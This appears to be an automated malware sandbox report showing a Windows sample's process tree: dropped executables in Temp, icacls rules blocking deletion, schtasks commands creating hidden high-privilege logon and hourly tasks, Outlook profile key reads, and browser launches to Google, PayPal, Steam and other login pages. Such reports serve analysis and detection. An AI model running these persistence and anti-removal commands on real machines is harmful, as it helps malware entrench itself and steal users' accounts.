PID 980 wrote to memory of 3608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3600 wrote to memory of 4612 N/A N/A C:\Users\Admin\AppData\Local\Temp\A818.exe
PID 3600 wrote to memory of 4612 N/A N/A C:\Users\Admin\AppData\Local\Temp\A818.exe
PID 3600 wrote to memory of 4612 N/A N/A C:\Users\Admin\AppData\Local\Temp\A818.exe
PID 3600 wrote to memory of 3008 N/A N/A C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3600 wrote to memory of 3008 N/A N/A C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3600 wrote to memory of 3008 N/A N/A C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3008 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3008 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3008 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3008 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3008 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3008 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3008 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3008 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3008 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3008 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 4240 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Windows\SysWOW64\icacls.exe
PID 4240 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Windows\SysWOW64\icacls.exe
PID 4240 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Windows\SysWOW64\icacls.exe
PID 4240 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 4240 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 4240 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3752 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3752 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3752 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3752 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3752 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3752 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3752 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3752 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3752 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3752 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3600 wrote to memory of 800 N/A N/A C:\Users\Admin\AppData\Local\Temp\C835.exe
PID 3600 wrote to memory of 800 N/A N/A C:\Users\Admin\AppData\Local\Temp\C835.exe
PID 800 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\C835.exe C:\Users\Admin\AppData\Local\Temp\C835.exe
PID 800 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\C835.exe C:\Users\Admin\AppData\Local\Temp\C835.exe
PID 800 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\C835.exe C:\Users\Admin\AppData\Local\Temp\C835.exe
PID 800 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\C835.exe C:\Users\Admin\AppData\Local\Temp\C835.exe
PID 800 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\C835.exe C:\Users\Admin\AppData\Local\Temp\C835.exe
PID 800 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\C835.exe C:\Users\Admin\AppData\Local\Temp\C835.exe
PID 3600 wrote to memory of 4880 N/A N/A C:\Users\Admin\AppData\Local\Temp\6205.exe
PID 3600 wrote to memory of 4880 N/A N/A C:\Users\Admin\AppData\Local\Temp\6205.exe
PID 3600 wrote to memory of 4880 N/A N/A C:\Users\Admin\AppData\Local\Temp\6205.exe
PID 4880 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\6205.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc0LF94.exe
PID 4880 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\6205.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc0LF94.exe
PID 4880 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\6205.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc0LF94.exe
PID 516 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc0LF94.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe
PID 516 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc0LF94.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe
PID 516 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc0LF94.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe
PID 3172 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe C:\Windows\SysWOW64\schtasks.exe
PID 3172 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe C:\Windows\SysWOW64\schtasks.exe
PID 3172 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe C:\Windows\SysWOW64\schtasks.exe
PID 3172 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe C:\Windows\SysWOW64\schtasks.exe
PID 3172 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe C:\Windows\SysWOW64\schtasks.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe

"C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe"

C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe

"C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1440 -ip 1440

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1440 -s 328

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9C21.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\A818.exe

C:\Users\Admin\AppData\Local\Temp\A818.exe

C:\Users\Admin\AppData\Local\Temp\C025.exe

C:\Users\Admin\AppData\Local\Temp\C025.exe

C:\Users\Admin\AppData\Local\Temp\C025.exe

C:\Users\Admin\AppData\Local\Temp\C025.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\0c74d987-e07e-499b-b0eb-21eaa09fb6b6" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\C025.exe

"C:\Users\Admin\AppData\Local\Temp\C025.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\C025.exe

"C:\Users\Admin\AppData\Local\Temp\C025.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 3856 -ip 3856

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3856 -s 584

C:\Users\Admin\AppData\Local\Temp\C835.exe

C:\Users\Admin\AppData\Local\Temp\C835.exe

C:\Users\Admin\AppData\Local\Temp\C835.exe

C:\Users\Admin\AppData\Local\Temp\C835.exe

C:\Users\Admin\AppData\Local\Temp\6205.exe

C:\Users\Admin\AppData\Local\Temp\6205.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc0LF94.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc0LF94.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST

C:\Users\Admin\AppData\Local\Temp\704E.exe

C:\Users\Admin\AppData\Local\Temp\704E.exe

C:\Users\Admin\AppData\Local\AceFlags\yafqg\ContextProperties.exe

C:\Users\Admin\AppData\Local\AceFlags\yafqg\ContextProperties.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3172 -ip 3172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 1736

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4CW110XU.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4CW110XU.exe

C:\Users\Admin\AppData\Local\AceFlags\yafqg\ContextProperties.exe

C:\Users\Admin\AppData\Local\AceFlags\yafqg\ContextProperties.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff916cb46f8,0x7ff916cb4708,0x7ff916cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff916cb46f8,0x7ff916cb4708,0x7ff916cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff916cb46f8,0x7ff916cb4708,0x7ff916cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff916cb46f8,0x7ff916cb4708,0x7ff916cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff916cb46f8,0x7ff916cb4708,0x7ff916cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff916cb46f8,0x7ff916cb4708,0x7ff916cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,14565503530349296244,9457041934507978451,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,14565503530349296244,9457041934507978451,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,18104348865823607404,16122096743738874223,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,18104348865823607404,16122096743738874223,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff916cb46f8,0x7ff916cb4708,0x7ff916cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1524,11867663414940510949,1377431933541226581,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,4705565606754705193,9095001987317197097,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4540 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff916cb46f8,0x7ff916cb4708,0x7ff916cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10703424040763496057,9611487481156834424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

